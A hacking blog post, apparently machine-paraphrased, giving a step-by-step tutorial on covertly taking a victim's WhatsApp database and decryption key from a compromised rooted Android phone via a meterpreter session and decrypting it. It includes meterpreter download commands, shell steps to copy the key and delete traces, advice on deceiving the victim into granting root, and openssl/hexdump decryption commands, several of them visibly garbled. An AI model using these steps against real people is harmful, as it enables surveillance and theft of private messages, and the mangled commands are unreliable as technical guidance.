Header Ads Widget

Hack and Decrypt WhatsApp Database (Remotely) [ROOT]

Yes this device should be Rooted, there is no way to do this remotely. I've been getting PM's on this and I can't just answer with the word SPOOF.


Almost everyone knows about it. It is an Android social application, which enables the user to send free messages online in seconds. The developers have made great strides and have advanced and sophisticated algorithms for encrypting and storing data, which is flexible with all updates! And that's why everyone uses it to send employees' messages the most because they know it's safe.

But is it?

Of course it is very safe, but if the victim is stupid or easily deceived, he or she is the most vulnerable here. I see most of the root users 'experienced' test/push to the top limits of the system. Following in the footsteps of their 'inexperienced users' and root/brick their android to accomplish a little work. They don’t even care about Cons.

Don't MissCreate a Persistent Back Door in Android Using Kali Linux Hack any Android

However, it does allow you to use fraud:

Step 1: Exploit and get access to Android!

This is an easy part that you all love and are used to doing.

Follow this guide to gain access to rooted Android.

Once on the meterpreter prompt, type check_root to make sure the device has been rooted.

What Do We Need?

To decrypt the database, we need the database itself and the key file in the folder/data, which we need to root to access the location. We cannot decrypt the database without the key (Until you want to spend more than 100 years or use a keyword!)

Step 2: Let's Start the Database Extraction Process:

In meterpreter type:

  • cd /
  • cd /sdcard/WhatsApp
  • ls (Print current directory)

cd Database

download msgstore.db.crypt8 (This will take some time, maybe LOT)

So, the database has been downloaded, now we need the 'decryption Key'

(Key file containing encryption keys cannot be retrieved unless your phone is rooted)

Step 3: Drag to Shell:

As mentioned earlier, but I include more details here:

To decrypt crypt8 files, we would need a key file. The key file keeps two sets of decryption keys - actual encryption key, K and the first vector called IV WhatsApp keeps the key file in a safe place.

Don't MissHow to Open Somebody's Computer Without a Password (Setting Up the Payload)

Extracting the key file, type:

  • shell
  • su (Large user access or just mounting rights)

Here comes the tricky part, if the target is knowledgeable and skilled, you should install the SuperSU system.

The application is responsible for maintaining the permissions of any app that can access root. It has all the logs.

Therefore, we need to convince the victim that the app is designed to upgrade (or otherwise) its Android system but at the same time requires root access to reach the highest level.

There are some situations with inexperienced and inexperienced users:

  • They have no SuperSU application installed.
  • They have not changed the settings for recently installed PROMPT applications instead of GRANT.

So in these cases we are really lucky!

Let's move on:

(If Android has no roots you can navigate, but don't copy or print the guide)

  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls

  • cd files
  • ls
  • cp key/sdcard/Download

(Means to copy the 'key' of the file to sdcard> Download folder)

Finish the shell:

^ C (Control + C)

The key was successfully extracted from /data to/sdcard!

Step 4: Again in Meterpreter:

Allow to download the extracted key file from our root directory as we create a encrypted database, type:

  • cd /
  • cd /sdcard/Download
  • download key
  • rm key (Make sure you do that to delete the key file)

The key was successfully extracted from our root directory!

Step 5: Decrypt the Database!

Now that we have the database and keys, we can easily break it down in one of two ways:

#1 With Simple Linux Commands:

With the two requirements in the root directory, open the end and type:

(Copy and paste one instruction at a time, not make a script on it, or it will work)

  • hexdump -e '2/1 "% 02x"' key | 's -b 253-316> aes.txt
  • hexdump -n 67 -e '2/1 "% 02x"' msgstore.db.crypt8 | 's -b 103-134> iv.txt
  • dd if = msgstore.db.crypt8 of = msgstore.db.crypt8.nohdr ibs = 67 skip = 1
  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $ (cat aes.txt) -iv $ (cat iv.txt)> msgstore.gz
  • gzip -cdq msgstore.gz> msgstore.db

If you just a little bash, you can easily understand these commands. (Source: here)

If command 4 does not apply, follow:

  • hexdump -e '2/1 "% 02x"' key | 's -b 253-316

(Copy printed text)

  • hexdump -n 67 -e '2/1 "% 02x"' msgstore.db.crypt8 | of -b 103-134

(Copy printed text)

  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (Paste text from first command) -iv (Paste text from second command)> msgstore.gz

These commands have bugs/errors in the result, so I highly recommend following method # 2.

#2 With Simple Windows WhatsApp Viewer Application:

The app has an excellent interface, from GitHub. Download the app there.

Don't MissHow to Hack any Android Phone (Remotely) 2020

Also, copy the key and database to windows, I hope you know how to do that.

  • Open the program (in true windows).
  • Click FIle, then 'Decrypt .crypt8'
  • In the dialog box that appears, provide the key file and Database.

  • Click OK, you will see that the 'msgstore.decrypted' file has already appeared on your desktop.

  • Open it using the same program, go to 'File' and then 'Open'.
  • Provide decrypted file, leave a blank Account name and 'wa.db', you can touch the phone again to remove this .db, to resolve the contact names as mentioned in the screenshot below.

  • Click 'OK'

And 'Boom' all your contacts with all the latest and most recent conversations waiting for your click

Tutorial Ends:

Now that you know how dangerous Rooting, actually is.

A cracker can not only perform this simple hack, he can even extract all the Wi-Fi passwords stored in your android, he can access everything, things that even you don't have access to!! He may spread to your PC once you connect your android, hack your accounts (saved passwords) and even frame you. You just become a mere pawn to his further plans.

So, think twice before rooting and be really careful, while holding a rooted android in your hands.

Post a comment